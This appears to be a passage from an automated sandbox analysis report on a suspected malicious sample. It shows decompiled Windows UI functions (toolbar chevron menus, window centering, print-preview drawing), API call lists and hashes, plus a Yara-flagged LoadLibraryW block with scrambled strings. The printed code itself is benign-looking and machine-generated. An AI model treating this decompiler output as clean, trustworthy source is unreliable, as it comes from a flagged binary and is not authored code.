                  				int _t349;
                  				struct tagMENUITEMINFOA _t350;
                  				int _t351;
                  				void* _t353;
                  				void* _t356;
                  
                  				_t356 = __eflags;
                  				_t335 = __edx;
                  				_push(0x174);
                  				E00431A9B(E0044AF14, __ebx, __edi, __esi);
                  				 *((intOrPtr*)(_t353 - 0x18)) = __ecx;
                  				E004014C0(_t353 - 0x10, __edx);
                  				_t337 = lstrlenA;
                  				 *(_t353 - 4) =  *(_t353 - 4) & 0x00000000;
                  				_t346 = lstrlenA("ReBarWindow32") + 1;
                  				_t148 = E004014F0(_t353 - 0x10, _t346);
                  				_t347 =  *(_t353 + 0xc);
                  				GetClassNameA( *_t347, _t148, _t346);
                  				E0040A356(_t353 - 0x10, 0xffffffff);
                  				 *(_t353 - 0x14) = E0040EE68(_t353 - 0x10, lstrlenA, _t347, _t356,  *_t347);
                  				if(E00409F00(_t353 - 0x10, _t335, "ReBarWindow32") != 0) {
                  					L37:
                  					_t348 = 0;
                  					L6:
                  					E004010B0( *((intOrPtr*)(_t353 - 0x10)) + 0xfffffff0, _t335);
                  					return E00431B73(_t348);
                  				}
                  				_t259 =  *(_t353 - 0x14);
                  				if(_t259 == 0 || E0041E99D(_t259, "@;E") == 0) {
                  					goto L37;
                  				} else {
                  					_t157 = E0040F898(_t259);
                  					if(_t157 == 0) {
                  						L7:
                  						E0041F754(_t259, _t353 - 0x78, _t337, _t347, __eflags);
                  						E004014C0(_t353 + 8, _t335);
                  						E004014C0(_t353 + 0xc, _t335);
                  						 *(_t353 - 4) = 3;
                  						E00422859(_t353 - 0x4c);
                  						_push( *((intOrPtr*)(_t353 - 0x18)));
                  						 *(_t353 - 4) = 4;
                  						E00422E1F(_t259, _t353 - 0xac, _t337, _t347, __eflags);
                  						 *((intOrPtr*)(_t353 - 0x180)) =  *((intOrPtr*)(_t259 + 0x98));
                  						 *(_t353 - 4) = 5;
                  						 *((intOrPtr*)(_t353 - 0x17c)) = 0x10;
                  						E004087FA(_t259, _t347[3], _t353 - 0x180);
                  						E00408830(_t259, _t347[3], _t353 - 0x88);
                  						_t260 = "ToolbarWindow32";
                  						_t339 = lstrlenA("ToolbarWindow32") + 1;
                  						GetClassNameA( *(_t353 - 0x160), E004014F0(_t353 - 0x10, _t339), _t339);
                  						E0040A356(_t353 - 0x10, 0xffffffff);
                  						_t340 = E0040EE68(_t353 - 0x10, _t339, _t347, __eflags,  *(_t353 - 0x160));
                  						 *(_t353 - 0x58) = _t340;
                  						__eflags = E00409F00(_t353 - 0x10, _t335, "ToolbarWindow32");
                  						if(__eflags != 0) {
                  							L36:
                  							 *(_t353 - 4) = 4;
                  							E00422E73(_t260, _t353 - 0xac, _t340, _t347, __eflags);
                  							 *(_t353 - 4) = 3;
                  							E00422E06(_t353 - 0x4c);
                  							E004010B0( &(( *(_t353 + 0xc))[0xfffffffffffffffc]), _t335);
                  							__eflags =  *((intOrPtr*)(_t353 + 8)) + 0xfffffff0;
                  							E004010B0( *((intOrPtr*)(_t353 + 8)) + 0xfffffff0, _t335);
                  							 *(_t353 - 4) = 0;
                  							E0040AED0(_t260, _t353 - 0x78, _t340, _t347, __eflags);
                  							goto L37;
                  						}
                  						__eflags = _t340;
                  						if(__eflags == 0) {
                  							goto L36;
                  						}
                  						__eflags = E0041E99D(_t340, 0x44fc0c);
                  						if(__eflags == 0) {
                  							goto L36;
                  						}
                  						_t349 =  &(_t347[6]);
                  						__eflags = _t349;
                  						 *((intOrPtr*)(_t353 - 0x80)) =  *_t349;
                  						 *(_t353 - 0x54) = _t349;
                  						E00422C3C( *(_t353 - 0x14), _t353 - 0x88);
                  						E00422BFB(_t340, _t353 - 0x88);
                  						_t261 = E00406ACA(_t340);
                  						 *(_t353 - 0x14) = _t261;
                  						while(1) {
                  							_t261 = _t261 - 1;
                  							 *(_t353 - 0x24) = _t261;
                  							E004087FA(_t340, _t261, _t353 - 0xec);
                  							_t191 = IntersectRect(_t353 - 0xfc, _t353 - 0x88, _t353 - 0xec);
                  							__eflags = _t191;
                  							if(_t191 != 0) {
                  								break;
                  							}
                  							__eflags = _t261;
                  							if(_t261 > 0) {
                  								continue;
                  							}
                  							break;
                  						}
                  						_t350 = 0x30;
                  						E00431160(_t340, _t353 - 0xdc, 0, _t350);
                  						 *(_t353 - 0xdc) = _t350;
                  						 *(_t353 - 0x28) = E00408817(_t340);
                  						E00423999(_t353 - 0x3c);
                  						 *((intOrPtr*)(_t353 - 0x3c)) = 0x44fff0;
                  						 *(_t353 - 4) = 6;
                  						E00425F9A(_t353 - 0x3c,  *(_t353 - 0x14) - _t261, 0xffffffff);
                  						E0041F51D(_t261, _t353 - 0x78, _t340, CreatePopupMenu());
                  						E0040876B(_t353 - 0x4c, _t353 - 0xac);
                  						_t351 = 0;
                  						while(1) {
                  							__eflags = _t261 -  *(_t353 - 0x14);
                  							if(__eflags >= 0) {
                  								break;
                  							}
                  							E00406956(_t340, _t335, __eflags, _t261, _t353 - 0x20, _t353 - 0x50, _t353 - 0x1c);
                  							__eflags =  *(_t353 - 0x50) & 0x00000001;
                  							if(( *(_t353 - 0x50) & 0x00000001) != 0) {
                  								__eflags = _t351;
                  								if(_t351 == 0) {
                  									L29:
                  									_t261 = _t261 + 1;
                  									__eflags = _t261;
                  									 *(_t353 - 0x24) = _t261;
                  									continue;
                  								}
                  								 *((intOrPtr*)(_t353 - 0xd8)) = 0x100;
                  								 *((intOrPtr*)(_t353 - 0xd4)) = 0x800;
                  								L28:
                  								InsertMenuItemA( *(_t353 - 0x74), _t261, 1, _t353 - 0xdc);
                  								goto L29;
                  							}
                  							 *((intOrPtr*)(_t353 - 0xd8)) = 0x162;
                  							_t223 = E00402720(_t353 + 8,  *((intOrPtr*)(_t353 - 0x20)));
                  							__eflags = _t223;
                  							if(_t223 == 0) {
                  								E00401E30(_t353 + 0xc);
                  							} else {
                  								E0041B29E(_t353 + 0xc,  *((intOrPtr*)(_t353 + 8)), 1, 0xa);
                  							}
                  							_t225 = E00404461(__eflags, 8);
                  							__eflags = _t225;
                  							if(_t225 == 0) {
                  								_t225 = 0;
                  								__eflags = 0;
                  							} else {
                  								 *(_t225 + 4) =  *(_t225 + 4) & 0x00000000;
                  								 *_t225 = 0x4502c8;
                  							}
                  							E004260C0(_t261, _t353 - 0x3c, _t351, _t225);
                  							_t227 =  *(_t353 - 0x28);
                  							__eflags = _t227;
                  							if(_t227 == 0) {
                  								L24:
                  								_t102 = _t353 - 0xbc;
                  								 *_t102 =  *(_t353 - 0xbc) & 0x00000000;
                  								__eflags =  *_t102;
                  								goto L25;
                  							} else {
                  								_t230 = E0040A2E6(_t353 - 0x11c,  *((intOrPtr*)(_t227 + 4)),  *((intOrPtr*)(_t353 - 0x1c)), _t353 - 0x11c);
                  								__eflags = _t230;
                  								if(_t230 == 0) {
                  									goto L24;
                  								}
                  								CopyRect(_t353 - 0x68, _t353 - 0x10c);
                  								OffsetRect(_t353 - 0x68,  ~( *(_t353 - 0x68)),  ~( *(_t353 - 0x64)));
                  								E00408744( *((intOrPtr*)(E0040B917(_t353 - 0x3c, _t351))), _t353 - 0xac,  *((intOrPtr*)(_t353 - 0x60)),  *((intOrPtr*)(_t353 - 0x5c)));
                  								_t240 = E0040B917(_t353 - 0x3c, _t351);
                  								_t241 = E0040B917(_t353 - 0x3c, _t351);
                  								 *_t241 = E00408791(_t353 - 0x4c,  *_t240);
                  								E00423E9D(_t353 - 0x4c, _t353 - 0x68, GetSysColor(4));
                  								E0040A307( *(_t353 - 0x28), _t353 - 0x4c,  *((intOrPtr*)(_t353 - 0x1c)), 0, 0, 1);
                  								_t249 = E0040B917(_t353 - 0x3c, _t351);
                  								_t250 = E0040B917(_t353 - 0x3c, _t351);
                  								 *_t250 = E00408791(_t353 - 0x4c,  *_t249);
                  								_t252 = E0040B917(_t353 - 0x3c, _t351);
                  								_t340 =  *(_t353 - 0x58);
                  								_t261 =  *(_t353 - 0x24);
                  								 *(_t353 - 0xbc) =  *_t252;
                  								L25:
                  								 *(_t353 - 0xb8) =  *(_t353 + 0xc);
                  								 *((intOrPtr*)(_t353 - 0xcc)) =  *((intOrPtr*)(_t353 - 0x20));
                  								 *((intOrPtr*)(_t353 - 0xd4)) = 0x100;
                  								_t351 = _t351 + 1;
                  								goto L28;
                  							}
                  						}
                  						E00413342(_t353 - 0x98,  *(_t353 - 0x54));
                  						E00422C3C( *((intOrPtr*)(_t353 - 0x18)), _t353 - 0x98);
                  						E0040D8F0(_t353 - 0x78, __eflags, 0,  *((intOrPtr*)(_t353 - 0x98)),  *((intOrPtr*)(_t353 - 0x8c)),  *((intOrPtr*)(_t353 - 0x18)), 0);
                  						_t264 = 0;
                  						 *((intOrPtr*)( *((intOrPtr*)(_t353 + 0x10)))) = 0;
                  						__eflags = _t351;
                  						if(__eflags <= 0) {
                  							L35:
                  							 *(_t353 - 4) = 5;
                  							E004239B0(_t353 - 0x3c);
                  							 *(_t353 - 4) = 4;
                  							E00422E73(_t264, _t353 - 0xac, 0, _t351, __eflags);
                  							 *(_t353 - 4) = 3;
                  							E00422E06(_t353 - 0x4c);
                  							E004010B0( &(( *(_t353 + 0xc))[0xfffffffffffffffc]), _t335);
                  							E004010B0( *((intOrPtr*)(_t353 + 8)) + 0xfffffff0, _t335);
                  							 *(_t353 - 4) = 0;
                  							E0040AED0(_t264, _t353 - 0x78, 0, _t351, __eflags);
                  							_t348 = 1;
                  							goto L6;
                  						} else {
                  							goto L32;
                  						}
                  						do {
                  							L32:
                  							_t314 =  *(E0040B917(_t353 - 0x3c, _t264));
                  							__eflags = _t314;
                  							if(_t314 != 0) {
                  								 *((intOrPtr*)( *_t314 + 4))(1);
                  							}
                  							_t264 = _t264 + 1;
                  							__eflags = _t264 - _t351;
                  						} while (__eflags < 0);
                  						goto L35;
                  					}
                  					_t361 =  *((intOrPtr*)(_t353 - 0x18)) - _t157;
                  					if( *((intOrPtr*)(_t353 - 0x18)) == _t157) {
                  						goto L7;
                  					}
                  					_t348 = E0040B10C(_t259, _t157, _t335, lstrlenA, _t347, _t361,  *((intOrPtr*)(_t353 + 8)), _t347,  *((intOrPtr*)(_t353 + 0x10)));
                  					goto L6;
                  				}
                  			}

                  APIs
                  • __EH_prolog3.LIBCMT ref: 0040B116
                  • lstrlenA.KERNEL32(ReBarWindow32,00000174), ref: 0040B136
                  • GetClassNameA.USER32(?,00000000,00000001), ref: 0040B14B
                  • lstrlenA.KERNEL32(ToolbarWindow32), ref: 0040B242
                  • GetClassNameA.USER32(?,00000000,00000001), ref: 0040B258
                  • IntersectRect.USER32 ref: 0040B301
                  • _memset.LIBCMT ref: 0040B31C
                  • CreatePopupMenu.USER32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?,@;E), ref: 0040B357
                  • CopyRect.USER32 ref: 0040B421
                  • OffsetRect.USER32(?,?,?), ref: 0040B437
                  • GetSysColor.USER32(00000004), ref: 0040B47E
                  • InsertMenuItemA.USER32(?,?,00000001,?), ref: 0040B52C
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Rect$ClassMenuNamelstrlen$ColorCopyCreateH_prolog3InsertIntersectItemOffsetPopup_memset
                  • String ID: @;E$ReBarWindow32$ToolbarWindow32
                  • API String ID: 3448309770-254675463
                  • Opcode ID: debc111b5dd1307f9d66f393594e2bf0b962d8dc5b9a3f3562b75b86374ad59f
                  • Instruction ID: cf85aa8ededd028deaa69243dfe9d59f927a8dbf855ff73a4b859d4dc9167fbb
                  • Opcode Fuzzy Hash: debc111b5dd1307f9d66f393594e2bf0b962d8dc5b9a3f3562b75b86374ad59f
                  • Instruction Fuzzy Hash: CFE17C71900219ABDF15EBA1CC91EEEB778EF04308F10416EF916B72D2DB385A44CB69
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • LoadLibraryW.KERNEL32(00000000), ref: 023E6E94
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659738344.00000000023E1000.00000020.00000001.sdmp, Offset: 023E1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_23e1000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: LibraryLoad
                  • String ID: ''X$:1F$CP^-$VIQZ$V`.$[s4+$`4TI$f$s9NQ$u,y$x5\$)n/$Hq$SUP
                  • API String ID: 1029625771-1276608707
                  • Opcode ID: 3093fb43f58e4485c7e8cd0b8b56c3c042fae31fe976a31e47ed5700ab0228f3
                  • Instruction ID: 7c6f7a3b790c61c9a0cb2f96642cecdecafc5226c7fd826daa307ddb59c96a69
                  • Opcode Fuzzy Hash: 3093fb43f58e4485c7e8cd0b8b56c3c042fae31fe976a31e47ed5700ab0228f3
                  • Instruction Fuzzy Hash: F742A5F08063698BDB659F429A897CDBB74BB11704F6096C8D25D3B224CB750BC6CF89
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 89%
                  			E0040E839(void* __ebx, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
                  				signed int _v8;
                  				intOrPtr _v12;
                  				struct tagRECT _v28;
                  				struct tagRECT _v44;
                  				struct tagRECT _v60;
                  				struct tagRECT _v80;
                  				char _v100;
                  				void* __edi;
                  				intOrPtr _t58;
                  				struct HWND__* _t59;
                  				intOrPtr _t94;
                  				signed int _t103;
                  				struct HWND__* _t104;
                  				void* _t105;
                  				struct HWND__* _t107;
                  				long _t108;
                  				long _t116;
                  				void* _t119;
                  				struct HWND__* _t121;
                  				void* _t123;
                  				intOrPtr _t125;
                  				intOrPtr _t129;
                  
                  				_t119 = __edx;
                  				_t105 = __ebx;
                  				_t125 = __ecx;
                  				_v12 = __ecx;
                  				_v8 = E00412B38(__ecx);
                  				_t58 = _a4;
                  				if(_t58 == 0) {
                  					if((_v8 & 0x40000000) == 0) {
                  						_t59 = GetWindow( *(__ecx + 0x20), 4);
                  					} else {
                  						_t59 = GetParent( *(__ecx + 0x20));
                  					}
                  					_t121 = _t59;
                  					if(_t121 != 0) {
                  						_t104 = SendMessageA(_t121, 0x36b, 0, 0);
                  						if(_t104 != 0) {
                  							_t121 = _t104;
                  						}
                  					}
                  				} else {
                  					_t4 = _t58 + 0x20; // 0xc033d88b
                  					_t121 =  *_t4;
                  				}
                  				_push(_t105);
                  				GetWindowRect( *(_t125 + 0x20),  &_v60);
                  				if((_v8 & 0x40000000) != 0) {
                  					_t107 = GetParent( *(_t125 + 0x20));
                  					GetClientRect(_t107,  &_v28);
                  					GetClientRect(_t121,  &_v44);
                  					MapWindowPoints(_t121, _t107,  &_v44, 2);
                  				} else {
                  					if(_t121 != 0) {
                  						_t103 = GetWindowLongA(_t121, 0xfffffff0);
                  						if((_t103 & 0x10000000) == 0 || (_t103 & 0x20000000) != 0) {
                  							_t121 = 0;
                  						}
                  					}
                  					_v100 = 0x28;
                  					if(_t121 != 0) {
                  						GetWindowRect(_t121,  &_v44);
                  						E0040C509(_t121, E0040C49C(_t121, 2),  &_v100);
                  						CopyRect( &_v28,  &_v80);
                  					} else {
                  						_t94 = E00403AA0();
                  						if(_t94 != 0) {
                  							_t94 =  *((intOrPtr*)(_t94 + 0x20));
                  						}
                  						E0040C509(_t121, E0040C49C(_t94, 1),  &_v100);
                  						CopyRect( &_v44,  &_v80);
                  						CopyRect( &_v28,  &_v80);
                  					}
                  				}
                  				_t108 = _v60.left;
                  				asm("cdq");
                  				_t123 = _v60.right - _t108;
                  				asm("cdq");
                  				_t120 = _v44.bottom;
                  				_t116 = (_v44.left + _v44.right - _t119 >> 1) - (_t123 - _t119 >> 1);
                  				_a4 = _v60.bottom - _v60.top;
                  				asm("cdq");
                  				asm("cdq");
                  				_t129 = (_v44.top + _v44.bottom - _v44.bottom >> 1) - (_a4 - _t120 >> 1);
                  				if(_t123 + _t116 > _v28.right) {
                  					_t116 = _t108 - _v60.right + _v28.right;
                  				}
                  				if(_t116 < _v28.left) {
                  					_t116 = _v28.left;
                  				}
                  				if(_a4 + _t129 > _v28.bottom) {
                  					_t129 = _v60.top - _v60.bottom + _v28.bottom;
                  				}
                  				if(_t129 < _v28.top) {
                  					_t129 = _v28.top;
                  				}
                  				return E00412D05(_v12, 0, _t116, _t129, 0xffffffff, 0xffffffff, 0x15);
                  			}

                  APIs
                    • Part of subcall function 00412B38: GetWindowLongA.USER32 ref: 00412B43
                  • GetParent.USER32(?), ref: 0040E868
                  • SendMessageA.USER32(00000000,0000036B,00000000,00000000), ref: 0040E88B
                  • GetWindowRect.USER32 ref: 0040E8A5
                  • GetWindowLongA.USER32 ref: 0040E8BB
                  • CopyRect.USER32 ref: 0040E908
                  • CopyRect.USER32 ref: 0040E912
                  • GetWindowRect.USER32 ref: 0040E91B
                  • CopyRect.USER32 ref: 0040E937
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Rect$Window$Copy$Long$MessageParentSend
                  • String ID: (
                  • API String ID: 808654186-3887548279
                  • Opcode ID: a95a7ec90529cae69c10791c29425d7303bfcfd659ec3fe840824abf005b3b54
                  • Instruction ID: ae4a21a952a57d180e51b079893b1d30c26c389abd653013c1f1d069e54050a6
                  • Opcode Fuzzy Hash: a95a7ec90529cae69c10791c29425d7303bfcfd659ec3fe840824abf005b3b54
                  • Instruction Fuzzy Hash: 24514F72900219ABDB00DFAADD85EEEBBB9BF48314F154526F905F3290DB34E9118B58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 94%
                  			E0041C904(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
                  				void* _t172;
                  				long _t176;
                  				long _t178;
                  				intOrPtr _t186;
                  				intOrPtr _t190;
                  				struct HBRUSH__* _t237;
                  				intOrPtr* _t242;
                  				intOrPtr _t247;
                  				signed int* _t274;
                  				intOrPtr* _t293;
                  				intOrPtr* _t296;
                  				intOrPtr _t329;
                  				intOrPtr _t343;
                  				intOrPtr _t344;
                  				void* _t345;
                  				signed int _t347;
                  				intOrPtr* _t353;
                  				intOrPtr _t358;
                  				int _t361;
                  				intOrPtr* _t362;
                  				int _t363;
                  				void* _t365;
                  
                  				_push(0x78);
                  				_t172 = E00431A9B(E0044BA35, __ebx, __edi, __esi);
                  				_t296 = __ecx;
                  				if( *((intOrPtr*)(__ecx + 0x8c)) == 0 ||  *((intOrPtr*)(__ecx + 0x98)) == 0) {
                  					L27:
                  					return E00431B73(_t172);
                  				} else {
                  					_t353 =  *((intOrPtr*)(_t365 + 8));
                  					E0041B41D(_t353, _t365 - 0x2c);
                  					 *((intOrPtr*)(_t365 - 0x38)) = 0;
                  					 *((intOrPtr*)(_t365 - 0x3c)) = 0x452f3c;
                  					 *(_t365 - 4) = 0;
                  					_t176 = GetSysColor(6);
                  					_t8 = _t365 - 0x3c; // 0x452f3c
                  					E0041B3F9(_t8, 0, 2, _t176);
                  					 *(_t365 - 0x30) =  *(_t365 - 0x30) & 0x00000000;
                  					 *((intOrPtr*)(_t365 - 0x34)) = 0x452f3c;
                  					 *(_t365 - 4) = 1;
                  					_t178 = GetSysColor(0x10);
                  					_t358 = 0;
                  					_t13 = _t365 - 0x34; // 0x452f3c
                  					E0041B3F9(_t13, 0, 3, _t178);
                  					 *((intOrPtr*)( *((intOrPtr*)(_t296 + 0x134)) + 0x10)) = 1;
                  					 *((intOrPtr*)(_t365 - 0x10)) = 0;
                  					if( *((intOrPtr*)(_t296 + 0x118)) <= 0) {
                  						L26:
                  						_t162 = _t365 - 0x3c; // 0x452f3c
                  						E004230B1(_t162);
                  						_t163 = _t365 - 0x34; // 0x452f3c
                  						E004230B1(_t163);
                  						_t164 = _t365 - 0x34; // 0x452f3c
                  						 *(_t365 - 4) = 0;
                  						 *((intOrPtr*)(_t365 - 0x34)) = 0x452f3c;
                  						E0040ADD4(_t296, _t164, _t353, 0x452f3c, _t383);
                  						 *(_t365 - 4) =  *(_t365 - 4) | 0xffffffff;
                  						_t169 = _t365 - 0x3c; // 0x452f3c
                  						 *((intOrPtr*)(_t365 - 0x3c)) = 0x452f3c;
                  						_t172 = E0040ADD4(_t296, _t169, _t353, 0x452f3c,  *(_t365 - 4));
                  						goto L27;
                  					} else {
                  						 *(_t365 - 0x14) =  *(_t365 - 0x14) & 0;
                  						goto L5;
                  						L12:
                  						 *(_t365 - 0x1c) = GetDeviceCaps(( *(_t296 + 0x90))[2], 0xa);
                  						SetRect( *((intOrPtr*)(_t296 + 0x134)) + 0x24, 0, 0, GetDeviceCaps(( *(_t296 + 0x90))[2], 8),  *(_t365 - 0x1c));
                  						E0041A5C8( *(_t296 + 0x90),  *((intOrPtr*)(_t296 + 0x134)) + 0x24);
                  						 *((intOrPtr*)( *_t353 + 0x1c))();
                  						_t361 =  *((intOrPtr*)(_t296 + 0xb0)) +  *(_t365 - 0x14);
                  						 *(_t365 - 0x1c) = _t361;
                  						if( *((intOrPtr*)(_t361 + 0x18)) == 0) {
                  							 *((intOrPtr*)( *_t296 + 0x194))( *((intOrPtr*)(_t365 - 0x10)));
                  							if( *((intOrPtr*)(_t296 + 0x10c)) != 0) {
                  								_t274 = E0041954D(_t296, _t365 - 0x44);
                  								 *(_t365 - 0x2c) =  ~( *_t274);
                  								 *(_t365 - 0x28) =  ~(_t274[1]);
                  								if( *((intOrPtr*)(_t296 + 0x80)) != 0) {
                  									GetClientRect( *(_t296 + 0x20), _t365 - 0x84);
                  									_t343 =  *((intOrPtr*)(_t296 + 0x68));
                  									if(_t343 <  *((intOrPtr*)(_t365 - 0x7c)) -  *(_t365 - 0x84)) {
                  										asm("cdq");
                  										 *(_t365 - 0x2c) =  *((intOrPtr*)(_t365 - 0x7c)) -  *(_t365 - 0x84) - _t343 - _t347 >> 1;
                  									}
                  									_t344 =  *((intOrPtr*)(_t296 + 0x6c));
                  									if(_t344 <  *((intOrPtr*)(_t365 - 0x78)) -  *((intOrPtr*)(_t365 - 0x80))) {
                  										asm("cdq");
                  										 *(_t365 - 0x28) =  *((intOrPtr*)(_t365 - 0x78)) -  *((intOrPtr*)(_t365 - 0x80)) - _t344 - _t347 >> 1;
                  									}
                  								}
                  							}
                  						}
                  						 *((intOrPtr*)( *_t353 + 0x34))(1);
                  						E004192C7(_t353, _t365 - 0x4c,  *(_t365 - 0x2c),  *(_t365 - 0x28));
                  						E00422AAE(_t353, _t365 - 0x54, 0, 0);
                  						 *((intOrPtr*)( *_t353 + 0x24))(5);
                  						_t83 = _t365 - 0x3c; // 0x452f3c
                  						E00423194(_t353, _t83);
                  						E0041B443(_t353, _t361);
                  						_t84 = _t365 - 0x34; // 0x452f3c
                  						E00423194(_t353, _t84);
                  						E00422BBC(_t353, _t365 - 0x5c,  *((intOrPtr*)(_t361 + 8)) + 1,  *((intOrPtr*)(_t361 + 4)) + 3);
                  						E004226D4(_t353,  *((intOrPtr*)(_t361 + 8)) + 1,  *((intOrPtr*)(_t361 + 0xc)) + 1);
                  						E00422BBC(_t353, _t365 - 0x64,  *_t361 + 3,  *((intOrPtr*)(_t361 + 0xc)) + 1);
                  						E004226D4(_t353,  *((intOrPtr*)(_t361 + 8)) + 1,  *((intOrPtr*)(_t361 + 0xc)) + 1);
                  						asm("movsd");
                  						asm("movsd");
                  						asm("movsd");
                  						asm("movsd");
                  						 *(_t365 - 0x74) =  *(_t365 - 0x74) + 1;
                  						 *((intOrPtr*)(_t365 - 0x70)) =  *((intOrPtr*)(_t365 - 0x70)) + 1;
                  						 *((intOrPtr*)(_t365 - 0x6c)) =  *((intOrPtr*)(_t365 - 0x6c)) - 2;
                  						 *((intOrPtr*)(_t365 - 0x68)) =  *((intOrPtr*)(_t365 - 0x68)) - 2;
                  						_t237 = GetStockObject(0);
                  						_t362 =  *((intOrPtr*)(_t365 + 8));
                  						FillRect( *(_t362 + 4), _t365 - 0x74, _t237);
                  						 *((intOrPtr*)( *_t362 + 0x20))(0xffffffff);
                  						_t242 =  *((intOrPtr*)(_t296 + 0x134));
                  						_t353 =  *((intOrPtr*)(_t365 - 0x10));
                  						if( *((intOrPtr*)(_t242 + 0x10)) == 0) {
                  							L23:
                  							 *((intOrPtr*)( *( *(_t296 + 0x90)) + 0x18))();
                  							 *((intOrPtr*)( *((intOrPtr*)(_t296 + 0x94)) + 0x20))( *((intOrPtr*)(_t365 - 0x18)));
                  							__eflags = _t353;
                  							if(_t353 == 0) {
                  								_t247 =  *((intOrPtr*)(_t296 + 0x114));
                  								__eflags = _t247 - 1;
                  								if(_t247 > 1) {
                  									__eflags = _t247 - 1;
                  									E0041BAC8(_t296, _t247 - 1, 1);
                  								}
                  							}
                  							goto L26;
                  						} else {
                  							_t329 =  *((intOrPtr*)(_t296 + 0x114));
                  							if(_t329 + _t353 > ( *( *((intOrPtr*)( *_t242 + 0x74)) + 0x1e) & 0x0000ffff)) {
                  								goto L23;
                  							}
                  							_t353 = _t353 + 1;
                  							 *((intOrPtr*)( *_t296 + 0x198))(_t329, _t353);
                  							_t363 =  *(_t365 - 0x1c);
                  							E0042DC27( *(_t296 + 0x90),  *((intOrPtr*)(_t363 + 0x18)),  *((intOrPtr*)(_t363 + 0x1c)));
                  							 *((intOrPtr*)( *( *(_t296 + 0x90)) + 0x74))(0xd, 0, 0, _t365 - 0x24);
                  							E0042D602( *(_t296 + 0x90), _t365 - 0x24);
                  							 *((intOrPtr*)(_t365 - 0x24)) =  *((intOrPtr*)(_t365 - 0x24)) +  *_t363;
                  							 *((intOrPtr*)(_t365 - 0x20)) =  *((intOrPtr*)(_t365 - 0x20)) +  *((intOrPtr*)(_t363 + 4));
                  							 *((intOrPtr*)(_t365 - 0x24)) =  *((intOrPtr*)(_t365 - 0x24)) + 1;
                  							 *((intOrPtr*)(_t365 - 0x24)) =  *((intOrPtr*)(_t365 - 0x24)) +  *(_t365 - 0x2c);
                  							 *((intOrPtr*)(_t365 - 0x20)) =  *((intOrPtr*)(_t365 - 0x20)) + 1;
                  							 *((intOrPtr*)(_t365 - 0x20)) =  *((intOrPtr*)(_t365 - 0x20)) +  *(_t365 - 0x28);
                  							E0042D9B9( *(_t296 + 0x90),  *((intOrPtr*)(_t365 - 0x24)),  *((intOrPtr*)(_t365 - 0x20)));
                  							E0042DB24( *(_t296 + 0x90));
                  							 *((intOrPtr*)( *( *(_t296 + 0x8c)) + 0x180))( *(_t296 + 0x90),  *((intOrPtr*)(_t296 + 0x134)));
                  							 *((intOrPtr*)( *( *(_t296 + 0x90)) + 0x18))();
                  							 *((intOrPtr*)( *((intOrPtr*)(_t296 + 0x94)) + 0x20))( *((intOrPtr*)(_t365 - 0x18)));
                  							 *(_t365 - 0x14) =  *(_t365 - 0x14) + 0x28;
                  							 *((intOrPtr*)(_t365 - 0x10)) = _t353;
                  							_t383 = _t353 -  *((intOrPtr*)(_t296 + 0x118));
                  							if(_t353 <  *((intOrPtr*)(_t296 + 0x118))) {
                  								_t353 =  *((intOrPtr*)(_t365 + 8));
                  								_t358 =  *((intOrPtr*)(_t365 - 0x10));
                  								L5:
                  								 *((intOrPtr*)(_t365 - 0x18)) =  *((intOrPtr*)( *((intOrPtr*)(_t296 + 0x94)) + 0x1c))();
                  								if(_t353 != 0) {
                  									_t186 =  *((intOrPtr*)(_t353 + 4));
                  								} else {
                  									_t186 = 0;
                  								}
                  								_t347 =  *( *(_t296 + 0x90));
                  								 *((intOrPtr*)(_t347 + 0x10))(_t186);
                  								 *((intOrPtr*)( *((intOrPtr*)(_t296 + 0x134)) + 0x14)) =  *((intOrPtr*)(_t296 + 0x114)) + _t358;
                  								_t190 =  *((intOrPtr*)(_t296 + 0x114));
                  								if(_t190 + _t358 >= _t190) {
                  									_t345 = _t190 + _t358;
                  									if(_t345 >= _t358) {
                  										_t293 =  *((intOrPtr*)(_t296 + 0x134));
                  										_t347 =  *( *((intOrPtr*)( *_t293 + 0x74)) + 0x1e) & 0x0000ffff;
                  										if(_t345 <= _t347) {
                  											_t347 =  *( *(_t296 + 0x8c));
                  											 *((intOrPtr*)(_t347 + 0x160))( *(_t296 + 0x90), _t293);
                  										}
                  									}
                  								}
                  								goto L12;
                  							} else {
                  								goto L26;
                  							}
                  						}
                  					}
                  				}
                  			}


























                  APIs
                  • __EH_prolog3.LIBCMT ref: 0041C90B
                    • Part of subcall function 0041B41D: GetViewportOrgEx.GDI32(?,?), ref: 0041B42B
                  • GetSysColor.USER32(00000006), ref: 0041C94F
                    • Part of subcall function 0041B3F9: CreatePen.GDI32(?,?,?), ref: 0041B40A
                  • GetSysColor.USER32(00000010), ref: 0041C96F
                  • GetDeviceCaps.GDI32(?,0000000A), ref: 0041CA29
                  • GetDeviceCaps.GDI32(?,00000008), ref: 0041CA39
                  • SetRect.USER32 ref: 0041CA4D
